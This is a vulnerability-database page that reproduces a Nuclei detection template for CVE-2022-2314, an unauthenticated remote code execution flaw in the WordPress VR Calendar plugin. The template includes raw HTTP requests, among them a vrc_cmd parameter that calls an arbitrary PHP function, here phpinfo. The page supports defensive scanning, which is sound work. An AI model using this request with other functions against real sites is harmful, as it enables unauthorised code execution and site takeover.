Lucene search
ProjectDiscoveryNUCLEI:CVE-2022-2314HistoryDec 12, 2022 - 4:25 p.m.
WordPress VR Calendar <=2.3.2 - Remote Code Execution
2022-12-1216:25:08
ProjectDiscovery
github.com
2
cve
wordpress
wp-plugin
rce
vr-calendar-sync
unauth
wpscan
vr_calendar_project
remote code execution
critical
vulnerability
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
10 High
AI Score
Confidence
High
0.319 Low
EPSS
Percentile
97.0%
WordPress VR Calendar plugin through 2.3.2 is susceptible to remote code execution. The plugin allows any user to execute arbitrary PHP functions on the site. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
id: CVE-2022-2314
info:
name: WordPress VR Calendar <=2.3.2 - Remote Code Execution
author: theamanrawat
severity: critical
description: |
WordPress VR Calendar plugin through 2.3.2 is susceptible to remote code execution. The plugin allows any user to execute arbitrary PHP functions on the site. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected WordPress site.
remediation: |
Update the WordPress VR Calendar plugin to version 2.3.3 or later to mitigate this vulnerability.
reference:
- https://wpscan.com/vulnerability/b22fe77c-844e-4c24-8023-014441cc1e82
- https://wordpress.org/plugins/vr-calendar-sync/
- https://nvd.nist.gov/vuln/detail/CVE-2022-2314
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-2314
cwe-id: CWE-78,NVD-CWE-noinfo
epss-score: 0.37332
epss-percentile: 0.97185
cpe: cpe:2.3:a:vr_calendar_project:vr_calendar:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 2
vendor: vr_calendar_project
product: vr_calendar
framework: wordpress
tags: cve,cve2022,wordpress,wp,wp-plugin,rce,vr-calendar-sync,unauth,wpscan,vr_calendar_project
http:
- raw:
- |
GET /wp-content/plugins/vr-calendar-sync/assets/js/public.js HTTP/1.1
Host: {{Hostname}}
- |
GET /wp-admin/admin-post.php?vrc_cmd=phpinfo HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body_2
words:
- "phpinfo"
- "PHP Version"
condition: and
- type: word
part: body_1
words:
- "vrc-calendar"
- type: status
status:
- 200
# digest: 4a0a0047304502206e3ec8a877f0add412d772250cca442c4f14251f414668bcc33927cf31d37c2c02210096bae018714fa494a24f5547acb225e394bffbb1504ec62ffd1f8100d62731c8:922c64590222798bb761d5b6d8e72950Related
wpvulndb
wpvulndb
VR Calendar < 2.3.2 - Unauthenticated Arbitrary Function Call
2022-07-22 00:00:00
wpexploit
wpexploit
VR Calendar < 2.3.2 - Unauthenticated Arbitrary Function Call
2022-07-22 00:00:00
cvelist
cvelist
CVE-2022-2314 VR Calendar < 2.3.2 - Unauthenticated Arbitrary Function Call
2022-08-15 08:36:40
nvd
nvd
CVE-2022-2314
2022-08-15 11:21:21
patchstack
patchstack
prion
prion
Design/Logic Flaw
2022-08-15 11:21:00
cve
cve
CVE-2022-2314
2022-08-15 11:21:21
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
10 High
AI Score
Confidence
High
0.319 Low
EPSS
Percentile
97.0%
Related for NUCLEI:CVE-2022-2314